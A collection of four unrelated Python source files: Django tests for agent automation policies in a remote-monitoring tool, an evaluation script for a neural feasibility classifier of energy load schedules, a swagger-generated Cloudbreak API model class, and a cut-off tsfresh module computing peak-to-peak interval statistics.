clients = baker.make("clients.Client", _quantity=5)
sites = baker.make("clients.Site", client=cycle(clients), _quantity=25)
server_agents = baker.make_recipe(
"agents.server_agent",
site=cycle(sites),
_quantity=25,
)
workstation_agents = baker.make_recipe(
"agents.workstation_agent",
site=cycle(sites),
_quantity=25,
)
policy = baker.make("automation.Policy", active=True)
# Add Client to Policy
policy.server_clients.add(server_agents[13].client)
policy.workstation_clients.add(workstation_agents[15].client)
resp = self.client.get(
f"/automation/policies/{policy.pk}/related/", format="json"
)
self.assertEqual(resp.status_code, 200)
self.assertEquals(len(resp.data["server_clients"]), 1)
self.assertEquals(len(resp.data["server_sites"]), 5)
self.assertEquals(len(resp.data["workstation_clients"]), 1)
self.assertEquals(len(resp.data["workstation_sites"]), 5)
self.assertEquals(len(resp.data["agents"]), 10)
# Add Site to Policy and the agents and sites length shouldn't change
policy.server_sites.add(server_agents[13].site)
policy.workstation_sites.add(workstation_agents[15].site)
self.assertEquals(len(resp.data["server_sites"]), 5)
self.assertEquals(len(resp.data["workstation_sites"]), 5)
self.assertEquals(len(resp.data["agents"]), 10)
# Add Agent to Policy and the agents length shouldn't change
policy.agents.add(server_agents[13])
policy.agents.add(workstation_agents[15])
self.assertEquals(len(resp.data["agents"]), 10)
def test_generating_agent_policy_checks(self):
from .tasks import generate_agent_checks_from_policies_task
# setup data
policy = baker.make("automation.Policy", active=True)
checks = self.create_checks(policy=policy)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.agent", site=site, policy=policy)
# test policy assigned to agent
generate_agent_checks_from_policies_task(policy.id, clear=True)
# make sure all checks were created. should be 7
agent_checks = Agent.objects.get(pk=agent.id).agentchecks.all()
self.assertEquals(len(agent_checks), 7)
# make sure checks were copied correctly
for check in agent_checks:
self.assertTrue(check.managed_by_policy)
if check.check_type == "diskspace":
self.assertEqual(check.parent_check, checks[0].id)
self.assertEqual(check.disk, checks[0].disk)
self.assertEqual(check.threshold, checks[0].threshold)
elif check.check_type == "ping":
self.assertEqual(check.parent_check, checks[1].id)
self.assertEqual(check.ip, checks[1].ip)
elif check.check_type == "cpuload":
self.assertEqual(check.parent_check, checks[2].id)
self.assertEqual(check.threshold, checks[2].threshold)
elif check.check_type == "memory":
self.assertEqual(check.parent_check, checks[3].id)
self.assertEqual(check.threshold, checks[3].threshold)
elif check.check_type == "winsvc":
self.assertEqual(check.parent_check, checks[4].id)
self.assertEqual(check.svc_name, checks[4].svc_name)
self.assertEqual(check.svc_display_name, checks[4].svc_display_name)
self.assertEqual(check.svc_policy_mode, checks[4].svc_policy_mode)
elif check.check_type == "script":
self.assertEqual(check.parent_check, checks[5].id)
self.assertEqual(check.script, checks[5].script)
elif check.check_type == "eventlog":
self.assertEqual(check.parent_check, checks[6].id)
self.assertEqual(check.event_id, checks[6].event_id)
self.assertEqual(check.event_type, checks[6].event_type)
def test_generating_agent_policy_checks_with_enforced(self):
from .tasks import generate_agent_checks_from_policies_task
# setup data
policy = baker.make("automation.Policy", active=True, enforced=True)
script = baker.make_recipe("scripts.script")
self.create_checks(policy=policy, script=script)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.agent", site=site, policy=policy)
self.create_checks(agent=agent, script=script)
generate_agent_checks_from_policies_task(policy.id, create_tasks=True)
# make sure each agent check says overriden_by_policy
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 14)
self.assertEqual(
Agent.objects.get(pk=agent.id)
.agentchecks.filter(overriden_by_policy=True)
.count(),
7,
)
def test_generating_agent_policy_checks_by_location(self):
from .tasks import generate_agent_checks_by_location_task
# setup data
policy = baker.make("automation.Policy", active=True)
self.create_checks(policy=policy)
clients = baker.make(
"clients.Client",
_quantity=2,
server_policy=policy,
workstation_policy=policy,
)
sites = baker.make("clients.Site", client=cycle(clients), _quantity=4)
server_agent = baker.make_recipe("agents.server_agent", site=sites[0])
workstation_agent = baker.make_recipe("agents.workstation_agent", site=sites[2])
agent1 = baker.make_recipe("agents.server_agent", site=sites[1])
agent2 = baker.make_recipe("agents.workstation_agent", site=sites[3])
generate_agent_checks_by_location_task(
{"site_id": sites[0].id},
"server",
clear=True,
create_tasks=True,
)
# server_agent should have policy checks and the other agents should not
self.assertEqual(Agent.objects.get(pk=server_agent.id).agentchecks.count(), 7)
self.assertEqual(
Agent.objects.get(pk=workstation_agent.id).agentchecks.count(), 0
)
self.assertEqual(Agent.objects.get(pk=agent1.id).agentchecks.count(), 0)
generate_agent_checks_by_location_task(
{"site__client_id": clients[0].id},
"workstation",
clear=True,
create_tasks=True,
)
# workstation_agent should now have policy checks and the other agents should not
self.assertEqual(
Agent.objects.get(pk=workstation_agent.id).agentchecks.count(), 7
)
self.assertEqual(Agent.objects.get(pk=server_agent.id).agentchecks.count(), 7)
self.assertEqual(Agent.objects.get(pk=agent1.id).agentchecks.count(), 0)
self.assertEqual(Agent.objects.get(pk=agent2.id).agentchecks.count(), 0)
def test_generating_policy_checks_for_all_agents(self):
from .tasks import generate_all_agent_checks_task
from core.models import CoreSettings
# setup data
policy = baker.make("automation.Policy", active=True)
self.create_checks(policy=policy)
site = baker.make("clients.Site")
server_agents = baker.make_recipe("agents.server_agent", site=site, _quantity=3)
workstation_agents = baker.make_recipe(
"agents.workstation_agent", site=site, _quantity=4
)
core = CoreSettings.objects.first()
core.server_policy = policy
core.workstation_policy = policy
core.save()
generate_all_agent_checks_task("server", clear=True, create_tasks=True)
# all servers should have 7 checks
for agent in server_agents:
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
for agent in workstation_agents:
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 0)
generate_all_agent_checks_task("workstation", clear=True, create_tasks=True)
# all agents should have 7 checks now
for agent in server_agents:
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
for agent in workstation_agents:
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
def test_delete_policy_check(self):
from .tasks import delete_policy_check_task
from .models import Policy
policy = baker.make("automation.Policy", active=True)
self.create_checks(policy=policy)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
agent.generate_checks_from_policies()
# make sure agent has 7 checks
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
# pick a policy check and delete it from the agent
policy_check_id = Policy.objects.get(pk=policy.id).policychecks.first().id
delete_policy_check_task(policy_check_id)
# make sure policy check doesn't exist on agent
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 6)
self.assertFalse(
Agent.objects.get(pk=agent.id)
.agentchecks.filter(parent_check=policy_check_id)
.exists()
)
def update_policy_check_fields(self):
from .tasks import update_policy_check_fields_task
from .models import Policy
policy = baker.make("automation.Policy", active=True)
self.create_checks(policy=policy)
agent = baker.make_recipe("agents.server_agent", policy=policy)
agent.generate_checks_from_policies()
# make sure agent has 7 checks
self.assertEqual(Agent.objects.get(pk=agent.id).agentchecks.count(), 7)
# pick a policy check and update it with new values
ping_check = (
Policy.objects.get(pk=policy.id)
.policychecks.filter(check_type="ping")
.first()
)
ping_check.ip = "12.12.12.12"
ping_check.save()
update_policy_check_fields_task(ping_check.id)
# make sure policy check was updated on the agent
self.assertEquals(
Agent.objects.get(pk=agent.id)
.agentchecks.filter(parent_check=ping_check.id)
.ip,
"12.12.12.12",
)
def test_generate_agent_tasks(self):
from .tasks import generate_agent_tasks_from_policies_task
# create test data
policy = baker.make("automation.Policy", active=True)
tasks = baker.make(
"autotasks.AutomatedTask", policy=policy, name=seq("Task"), _quantity=3
)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
generate_agent_tasks_from_policies_task(policy.id, clear=True)
agent_tasks = Agent.objects.get(pk=agent.id).autotasks.all()
# make sure there are 3 agent tasks
self.assertEqual(len(agent_tasks), 3)
for task in agent_tasks:
self.assertTrue(task.managed_by_policy)
if task.name == "Task1":
self.assertEqual(task.parent_task, tasks[0].id)
self.assertEqual(task.name, tasks[0].name)
if task.name == "Task2":
self.assertEqual(task.parent_task, tasks[1].id)
self.assertEqual(task.name, tasks[1].name)
if task.name == "Task3":
self.assertEqual(task.parent_task, tasks[2].id)
self.assertEqual(task.name, tasks[2].name)
def test_generate_agent_tasks_by_location(self):
from .tasks import generate_agent_tasks_by_location_task
# setup data
policy = baker.make("automation.Policy", active=True)
baker.make(
"autotasks.AutomatedTask", policy=policy, name=seq("Task"), _quantity=3
)
clients = baker.make(
"clients.Client",
_quantity=2,
server_policy=policy,
workstation_policy=policy,
)
sites = baker.make("clients.Site", client=cycle(clients), _quantity=4)
server_agent = baker.make_recipe("agents.server_agent", site=sites[0])
workstation_agent = baker.make_recipe("agents.workstation_agent", site=sites[2])
agent1 = baker.make_recipe("agents.agent", site=sites[1])
agent2 = baker.make_recipe("agents.agent", site=sites[3])
generate_agent_tasks_by_location_task(
{"site_id": sites[0].id}, "server", clear=True
)
# all servers in site1 and site2 should have 3 tasks
self.assertEqual(
Agent.objects.get(pk=workstation_agent.id).autotasks.count(), 0
)
self.assertEqual(Agent.objects.get(pk=server_agent.id).autotasks.count(), 3)
self.assertEqual(Agent.objects.get(pk=agent1.id).autotasks.count(), 0)
self.assertEqual(Agent.objects.get(pk=agent2.id).autotasks.count(), 0)
generate_agent_tasks_by_location_task(
{"site__client_id": clients[0].id}, "workstation", clear=True
)
# all workstations in Default1 should have 3 tasks
self.assertEqual(
Agent.objects.get(pk=workstation_agent.id).autotasks.count(), 3
)
self.assertEqual(Agent.objects.get(pk=server_agent.id).autotasks.count(), 3)
self.assertEqual(Agent.objects.get(pk=agent1.id).autotasks.count(), 0)
self.assertEqual(Agent.objects.get(pk=agent2.id).autotasks.count(), 0)
@patch("autotasks.tasks.delete_win_task_schedule.delay")
def test_delete_policy_tasks(self, delete_win_task_schedule):
from .tasks import delete_policy_autotask_task
policy = baker.make("automation.Policy", active=True)
tasks = baker.make("autotasks.AutomatedTask", policy=policy, _quantity=3)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
agent.generate_tasks_from_policies()
delete_policy_autotask_task(tasks[0].id)
delete_win_task_schedule.assert_called_with(agent.autotasks.first().id)
@patch("autotasks.tasks.run_win_task.delay")
def test_run_policy_task(self, run_win_task):
from .tasks import run_win_policy_autotask_task
tasks = baker.make("autotasks.AutomatedTask", _quantity=3)
run_win_policy_autotask_task([task.id for task in tasks])
run_win_task.side_effect = [task.id for task in tasks]
self.assertEqual(run_win_task.call_count, 3)
for task in tasks:
run_win_task.assert_any_call(task.id)
@patch("agents.models.Agent.nats_cmd")
def test_update_policy_tasks(self, nats_cmd):
from .tasks import update_policy_task_fields_task
from autotasks.models import AutomatedTask
nats_cmd.return_value = "ok"
# setup data
policy = baker.make("automation.Policy", active=True)
tasks = baker.make(
"autotasks.AutomatedTask", enabled=True, policy=policy, _quantity=3
)
site = baker.make("clients.Site")
agent = baker.make_recipe("agents.server_agent", site=site, policy=policy)
agent.generate_tasks_from_policies()
tasks[0].enabled = False
tasks[0].save()
update_policy_task_fields_task(tasks[0].id, enabled=False)
self.assertFalse(AutomatedTask.objects.get(parent_task=tasks[0].id).enabled)
|
from typing import Tuple, Dict
import torch.multiprocessing as mp
mp.set_start_method('spawn', True)
import sys, os
if os.getcwd() not in sys.path: sys.path.append(os.getcwd())
import copy
import datetime
import logging
import logging.config
from learning.logging_config import logging_config
import numpy as np
np.set_printoptions(suppress=True)
import torch
import torch.nn as nn
state_model_location = 'learning/statebased/output/' + '2020-08-20_18-18-40_chpp_hwt_state'
action_model_location = 'learning/statebased/output/' + '2020-08-17_11-55-57_chpp_hwt_actions'
# load neural networks (including corresponding simulation model)
from modules.utils import load_neural_model
state_meta_data, state_nn_parameters, state_neural_network = load_neural_model(state_model_location)
action_meta_data, action_nn_parameters, action_neural_network = load_neural_model(action_model_location)
simulation_model = state_meta_data['model']
sampling_parameters = state_meta_data['sampling_parameters']
simulation_model.eval()
#""""
# HOTFIX for CHPP_HWT and DFH:
#
# This block is only required if the original experiment is repeated with the CHPP_HWT or DFH models provided in the repository.
# The heat demand data loaded from crest_heat_demand.txt during the training and saved into the simulation model was erroneous.
# This error did not affect the training process, but does influence the evaluation results, making them better as they should be.
# Newly trained models do not require this step.
#
with open('data/crest_heat_demand.txt', 'r') as file: # read data
demand_series = np.loadtxt(file, delimiter='\t', skiprows=1) # read file, dismiss header
demand_series = demand_series.transpose(1,0) # dim 0 identifies the series
demand_series *= 1000 # kW -> W
simulation_model.demand.demand_series = demand_series
# HOTFIX END
#""""
#
# parameters
#
evaluation_periods = [96,32,24,4]
time_step_count = 96
feasibility_threshold = 0.5
simulation_model.constraint_fuzziness = 0.0
process_count = 24
schedule_count_random = 25000
schedule_count_reference = 25000
schedule_count_arbitrary = 50000
# CHPP systems
from modules.simulation.integrated.holl import HoLL
if type(simulation_model) is HoLL:
sampling_parameters['temp_distribution'] = ([(35,40), (40,60), (60,65)], [1/20, 18/20, 1/20])
else:
sampling_parameters['temp_distribution'] = ([(55,60), (60,80), (80,85)], [1/20, 18/20, 1/20])
# BESS systems
sampling_parameters['soc_distribution'] = ([(simulation_model.constraint_fuzziness, 1-simulation_model.constraint_fuzziness)], [1])
# EVSE systems
sampling_parameters['possible_capacities'] = [17.6, 27.2, 36.8, 37.9, 52, 70, 85, 100]
logger = None
if __name__ == '__main__':
logging_config['handlers']['file']['filename'] = '{}/{}-log.txt'.format(os.path.dirname(__file__), datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'))
logging_config['formatters']['standard']['format'] = '%(message)s'
logging.config.dictConfig(logging_config)
logger = logging.getLogger('')
logger.info(state_model_location)
logger.info(action_model_location)
# create neural model
from modules.neuralnetwork.models.statebased import NeuralModel
def classify_by_interaction(model: NeuralModel, feasibility_threshold):
# experimental
actions = model.actions
state, interaction, ratings = model.batch_transition(actions)
ratings = torch.abs(torch.Tensor(actions) - interaction[:,0])
return ratings/max(ratings), actions[ratings < max(-min(actions), max(actions)) * feasibility_threshold]
actions = simulation_model.actions
neural_model = NeuralModel(state_meta_data['dt'], actions,
state_neural_network, state_meta_data['input_processor'], state_meta_data['ann_output_processor'],
#classify_by_interaction,
action_neural_network, action_meta_data['input_processor'], action_meta_data['ann_output_processor'],
feasibility_threshold=feasibility_threshold)
#
# test classification
#
from modules.simulation.simulationmodel import SimulationModel
def choose_arbitrary_action(logger, step, model: SimulationModel, filter_list=[], **kwargs) -> Tuple[int, bool, Dict]:
return np.random.choice(model.actions), False, {}
def choose_action_randomly(logger, step, model: SimulationModel
, filter_list=[], **kwargs) -> Tuple[int, bool, Dict]:
feasible_actions = np.setdiff1d(model.feasible_actions, filter_list)
if len(feasible_actions) == 0:
logger.info('Action selection fallback for state {}'.format(np.round(model.state, 4).tolist()))
return actions[np.argmax(model.ratings)], True, {}
return np.random.choice(feasible_actions), False, {}
def choose_action_using_reference( logger, step, model: SimulationModel, filter_list=[],
reference_schedule=None, reference_schedule_length=24, reference_schedule_step_length=4,
reference_intervals=None, **kwargs) -> Tuple[int, bool, Dict]:
if reference_intervals is None:
actions = model.actions
reference_intervals = np.linspace(min(actions), max(actions), 5)
if reference_schedule is None:
reference_schedule = np.random.choice(len(reference_intervals)-1, reference_schedule_length+1).repeat(reference_schedule_step_length)
#reference_schedule = np.roll(reference_schedule, np.random.choice(reference_schedule_step_length))
next_kwargs = {
'reference_schedule': reference_schedule,
'reference_intervals': reference_intervals,
'reference_schedule_length': reference_schedule_length,
'reference_schedule_step_length': reference_schedule_step_length
}
feasible_actions = np.setdiff1d(model.feasible_actions, filter_list)
if len(feasible_actions) == 0:
logger.info('Action selection fallback for state {}'.format(np.round(model.state, 4).tolist()))
return model.actions[np.argmax(model.ratings)], True, next_kwargs
mask = []
for i in range(len(reference_intervals)):
mask = (feasible_actions >= reference_intervals[max(0,reference_schedule[step]-i)])
mask &= (feasible_actions <= reference_intervals[min(len(reference_intervals)-1, reference_schedule[step]+1+i)])
if sum(mask) > 0:
break
return np.random.choice(feasible_actions[mask]), False, next_kwargs
# Generator Code
#
def classify_load_profile(neural_model, simulation_model, choose_action, time_step_count, sampling_parameters, logger):
"""
Generates a load schedule from a neural model and evaluates it with the simulation model
"""
# make sure the random seeds are different in each process
np.random.seed(int.from_bytes(os.urandom(4), byteorder='little'))
# determine an initial state
simulation_model.eval() # sample with eval() setting
simulation_model.sample_state(**sampling_parameters)
neural_model.load_state(simulation_model.state)
simulation_model.train() # strict constraints (which the ANN should have learned)
# do a forecast in order to predetermine the external input and the mask required to update inputs
forecast, forecast_mask = simulation_model.forecast(time_step_count)
# save initial states to restore them later
result = {}
kwargs = {}
result['infeasible_at'] = time_step_count
result['classified_infeasible_at'] = time_step_count
for step in range(time_step_count):
#result['_'] = step # DEBUG / Testing
ann_feasible = neural_model.feasible_actions
sim_feasible = simulation_model.feasible_actions
# choose an action
action_choice, fallback_action, kwargs = choose_action(logger, step, simulation_model, [], **kwargs)
if not np.isin(action_choice, sim_feasible) and result['infeasible_at'] >= time_step_count:
# infeasible action and therefore an infeasible load profile
# an entry smaller than time_step_count means it has already been detected as infeasible
result['infeasible_at'] = step
if not np.isin(action_choice, ann_feasible):
# action deemed infeasible
# there is nothing left to do
result['classified_infeasible_at'] = step
break
# while a not detected infeasibility is actually an error at this moment,
# the remaining load schedule could still provide further indications that it is actually infeasible
# (proceeding like this is also required for comparability with Bremer2015)
state, interaction = neural_model.transition(action_choice)
simulation_model.transition(action_choice)
if step + 1 < time_step_count:
# post processing to incorporate forecasts
neural_model.state = state * (1-forecast_mask[step+1]) + forecast_mask[step+1] * forecast[step+1]
#else:
# reached final step without stopping due to a detected infeasibility
return result
if __name__ == '__main__':
logger.info('----------------------------------------------------------------')
logger.info('Schedule classification')
logger.info('----------------------------------------------------------------')
logger.info('Feasibility threshold {}'.format(feasibility_threshold))
logger.info('Constraint fuzziness {}'.format(simulation_model.constraint_fuzziness))
import json
logger.info('Testing {} arbitrary schedules'.format(schedule_count_arbitrary))
with mp.Pool(processes=process_count) as pool:
results_arbitrary = pool.starmap(classify_load_profile,
[(neural_model, simulation_model, choose_arbitrary_action, time_step_count, sampling_parameters, logger) for i in range(schedule_count_arbitrary)])
logger.info('Testing {} random strategy schedules'.format(schedule_count_random))
with mp.Pool(processes=process_count) as pool:
results_random = pool.starmap(classify_load_profile,
[(neural_model, simulation_model, choose_action_randomly, time_step_count, sampling_parameters, logger) for i in range(schedule_count_random)])
logger.info('Testing {} reference strategy schedules'.format(schedule_count_reference))
with mp.Pool(processes=process_count) as pool:
results_reference = pool.starmap(classify_load_profile,
[(neural_model, simulation_model, choose_action_using_reference, time_step_count, sampling_parameters, logger) for i in range(schedule_count_reference)])
for evaluation_period in evaluation_periods:
feasible = [1 if entry['infeasible_at'] >= evaluation_period else 0 for array in [results_arbitrary, results_random, results_reference] for entry in array]
classified_feasible = [1 if entry['classified_infeasible_at'] >= evaluation_period else 0 for array in [results_arbitrary, results_random, results_reference] for entry in array]
correctly_classified = sum([truth == result for truth, result in zip(feasible, classified_feasible)])
true_positive = sum([truth == result for truth, result in zip(feasible, classified_feasible) if truth == 1])
false_positive = sum([truth != result for truth, result in zip(feasible, classified_feasible) if result == 1])
true_negative = sum([truth == result for truth, result in zip(feasible, classified_feasible) if truth == 0])
false_negative = sum([truth != result for truth, result in zip(feasible, classified_feasible) if result == 0])
logger.info('--- {} time steps ---'.format(evaluation_period))
logger.info('{} of {} schedules classified correctly'.format(correctly_classified, len(feasible)))
logger.info('Feasible schedule(s) \t{}'.format(sum(feasible)))
logger.info('Infeasible schedule(s) \t{}'.format(len(feasible) - sum(feasible)))
logger.info('True positives \t\t{}'.format(true_positive))
logger.info('False positives \t{}'.format(false_positive))
logger.info('True negatives \t\t{}'.format(true_negative))
logger.info('False negatives \t{}'.format(false_negative))
logger.info('---')
|
# coding: utf-8
"""
Cloudbreak API
Cloudbreak is a powerful left surf that breaks over a coral reef, a mile off southwest the island of Tavarua, Fiji. Cloudbreak is a cloud agnostic Hadoop as a Service API. Abstracts the provisioning and ease management and monitoring of on-demand clusters. SequenceIQ's Cloudbreak is a RESTful application development platform with the goal of helping developers to build solutions for deploying Hadoop YARN clusters in different environments. Once it is deployed in your favourite servlet container it exposes a REST API allowing to span up Hadoop clusters of arbitary sizes and cloud providers. Provisioning Hadoop has never been easier. Cloudbreak is built on the foundation of cloud providers API (Amazon AWS, Microsoft Azure, Google Cloud Platform, Openstack), Apache Ambari, Docker lightweight containers, Swarm and Consul. For further product documentation follow the link: <a href=\"http://hortonworks.com/apache/cloudbreak/\">http://hortonworks.com/apache/cloudbreak/</a>
OpenAPI spec version: 2.7.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class StructuredParameterQueryResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'property_name': 'str',
'description': 'str',
'default_path': 'str',
'related_service': 'str',
'property_file': 'str',
'protocol': 'str',
'property_display_name': 'str'
}
attribute_map = {
'property_name': 'propertyName',
'description': 'description',
'default_path': 'defaultPath',
'related_service': 'relatedService',
'property_file': 'propertyFile',
'protocol': 'protocol',
'property_display_name': 'propertyDisplayName'
}
def __init__(self, property_name=None, description=None, default_path=None, related_service=None, property_file=None, protocol=None, property_display_name=None):
"""
StructuredParameterQueryResponse - a model defined in Swagger
"""
self._property_name = None
self._description = None
self._default_path = None
self._related_service = None
self._property_file = None
self._protocol = None
self._property_display_name = None
if property_name is not None:
self.property_name = property_name
if description is not None:
self.description = description
if default_path is not None:
self.default_path = default_path
if related_service is not None:
self.related_service = related_service
if property_file is not None:
self.property_file = property_file
if protocol is not None:
self.protocol = protocol
if property_display_name is not None:
self.property_display_name = property_display_name
@property
def property_name(self):
"""
Gets the property_name of this StructuredParameterQueryResponse.
:return: The property_name of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._property_name
@property_name.setter
def property_name(self, property_name):
"""
Sets the property_name of this StructuredParameterQueryResponse.
:param property_name: The property_name of this StructuredParameterQueryResponse.
:type: str
"""
self._property_name = property_name
@property
def description(self):
"""
Gets the description of this StructuredParameterQueryResponse.
:return: The description of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""
Sets the description of this StructuredParameterQueryResponse.
:param description: The description of this StructuredParameterQueryResponse.
:type: str
"""
self._description = description
@property
def default_path(self):
"""
Gets the default_path of this StructuredParameterQueryResponse.
:return: The default_path of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._default_path
@default_path.setter
def default_path(self, default_path):
"""
Sets the default_path of this StructuredParameterQueryResponse.
:param default_path: The default_path of this StructuredParameterQueryResponse.
:type: str
"""
self._default_path = default_path
@property
def related_service(self):
"""
Gets the related_service of this StructuredParameterQueryResponse.
:return: The related_service of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._related_service
@related_service.setter
def related_service(self, related_service):
"""
Sets the related_service of this StructuredParameterQueryResponse.
:param related_service: The related_service of this StructuredParameterQueryResponse.
:type: str
"""
self._related_service = related_service
@property
def property_file(self):
"""
Gets the property_file of this StructuredParameterQueryResponse.
:return: The property_file of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._property_file
@property_file.setter
def property_file(self, property_file):
"""
Sets the property_file of this StructuredParameterQueryResponse.
:param property_file: The property_file of this StructuredParameterQueryResponse.
:type: str
"""
self._property_file = property_file
@property
def protocol(self):
"""
Gets the protocol of this StructuredParameterQueryResponse.
:return: The protocol of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._protocol
@protocol.setter
def protocol(self, protocol):
"""
Sets the protocol of this StructuredParameterQueryResponse.
:param protocol: The protocol of this StructuredParameterQueryResponse.
:type: str
"""
self._protocol = protocol
@property
def property_display_name(self):
"""
Gets the property_display_name of this StructuredParameterQueryResponse.
:return: The property_display_name of this StructuredParameterQueryResponse.
:rtype: str
"""
return self._property_display_name
@property_display_name.setter
def property_display_name(self, property_display_name):
"""
Sets the property_display_name of this StructuredParameterQueryResponse.
:param property_display_name: The property_display_name of this StructuredParameterQueryResponse.
:type: str
"""
self._property_display_name = property_display_name
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, StructuredParameterQueryResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
|
import warnings
import numpy as np
import pandas as pd
from scipy.signal import find_peaks, find_peaks_cwt, ricker
from tsfresh.feature_extraction.feature_calculators import set_property, _roll
from tsfresh.feature_extraction.settings import ComprehensiveFCParameters
from tsfresh.utilities.string_manipulation import convert_to_output_format
"""These functions return various measures of "peak-to-peak" timing.
Peaks could represent, for example, steps in an accelerometer signal,
or pulses on a PPG, where high standard deviation in peak-to-peak
timing could indicate an irregular gait or heart rhythm. tsfresh
already provides a *count* of peaks, but doesn't directly provide any
measure of *variability* in timing between the peaks. This module
adds some measures of variability that are typically used in heart
rhythm analysis."""
############################## Helper functions: ###############################
def get_fc_parameters( features = ['stdev','rmssd','sdsd','nn','pnn'], # TODO: npeaks
method_options = ['normal','tsfresh','cwt'],
n_options = [1,3,5,10,15,20,25,50],
ms_options = [20,50],
include_comprehensive_defaults = True):
"""The `n` parameter depends heavily on the sample rate of the signal.
Therefore, it will likely be beneficial to customize `n_options`
for your application.
The default ms_options are typical for HRV measurement; more
details here: https://dx.doi.org/10.1136/heart.88.4.378
"""
if include_comprehensive_defaults:
params = ComprehensiveFCParameters()
else:
params = {}
nn_features = [f for f in features if 'nn' in f]
non_nn_features = [f for f in features if 'nn' not in f]
standard_params = [{'feature': f, 'method': m, 'n': n} for f in non_nn_features for m in method_options for n in n_options]
extended_params = [{'feature': f, 'method': m, 'n': n, 'ms': ms} for f in nn_features for m in method_options for n in n_options for ms in ms_options]
# TODO: rel_height = [0.25, 0.5, 0.75, 1.0] for 'normal' method
# TODO: height = [0, None]? 0 might work for a wander-corrected signal.
params[ppi] = standard_params + extended_params
return params
def get_peak_locs(x, method, n, height=None, rel_height=0.5):
"""Find the locations of the peaks in x. x must be a Pandas Series.
If x.index is a DatetimeIndex (or at least one level is), then the
returned peak locations will be times. Otherwise, they will be
integers (i.e. row numbers). Note that in the case where a Series
has an integer index, the returned integers will represent the
iloc, not necessarily the loc.
"""
# TODO: how to handle missed samples/frames with int index?
# e.g. if index goes [1, 3, 4, 5, 8, 9, 12] and we find peaks at
# iloc 2 and 5, we'll think that the distance between them is 3
# (rows), but really it was 5 (samples). there may be nothing we
# can do, unless user specifies a "sample #" index level.
if type(x) != pd.Series:
raise TypeError
# Find peaks:
if method=='normal':
# this is similar to, but not exactly the same as, the tsfresh
# `number_peaks` method.
peak_locs, peak_props = find_peaks(
x,
distance = n,
height = height, # probably only useful with baseline wander removed
# TODO?: prominence:
# prominence = ... 1? probably depends on signal variance.
# wlen = ... TODO?
# TODO?: peak width:
# width = ... 10?
# rel_height = rel_height,
)
# TODO?: use prominences as features too? e.g. mean
# prominence? could be a good indicator of recording quality?
elif method=='tsfresh':
# this is the same as the tsfresh `number_peaks` method.
x_reduced = x[n:-n]
res = None
for i in range(1, n + 1):
result_first = (x_reduced > _roll(x, i)[n:-n])
if res is None:
res = result_first
else:
res &= result_first
res &= (x_reduced > _roll(x, -i)[n:-n])
peak_locs = np.where(res)[0]
elif method=='cwt':
# this is the same as the tsfresh `number_cwt_peaks` method.
peak_locs = find_peaks_cwt(
x,
widths = np.array(list(range(1, n + 1))),
wavelet = ricker
# TODO?:
# max_distances = ...
# gap_thresh = ...
# min_length = ...
# min_snr = ...
# noise_percf = ...
# window_size = ...
)
else:
raise ValueError("method must be 'normal', 'tsfresh', or 'cwt'.")
# Look for a DatetimeIndex:
dt_level_name = None
if type(x.index) == pd.MultiIndex:
for level in x.index.levels:
if type(level) == pd.DatetimeIndex:
dt_level_name = level.name
break
elif type(x.index) == pd.DatetimeIndex:
dt_level_name = x.index.name
# Convert peak locations to times, if we can:
if len(peak_locs)==0:
warnings.warn("Couldn't find any peaks in signal.")
return np.array([])
if dt_level_name is not None:
peak_loc_times = x.index.get_level_values(dt_level_name)[peak_locs]
else:
# just keep the integer indexing
peak_loc_times = peak_locs
return peak_loc_times
def peaklocs_to_ppis(peak_locs):
"""peak_locs is a 1D array/series of peak locations, which may be
represented as times or integers. We'll convert it to the
distance between peaks, which may be timedeltas or number of
samples.
"""
if len(peak_locs) < 2:
return np.array([])
ppis = peak_locs[1:] - peak_locs[:-1]
return ppis
######################### Combined feature calculator: #########################
@set_property("fctype", "combiner")
@set_property("input", "pd.Series")
def ppi(x, param):
"""
Calculates various peak-to-peak interval statistics, like RMSSD and pNN.
This function uses the given parameters (`method` and `n`) to
detect the peaks in x. It then returns standard deviation, RMSSD,
SDSD, NN, and PNN based on the peak-to-peak intervals (PPIs) it
found. These features are typically used to characterize cardiac
arrhythmias.
:param x: the time series to calculate the feature of
:type x: pandas.Series
:param param: contains dictionaries {'feature': f, 'method': m,
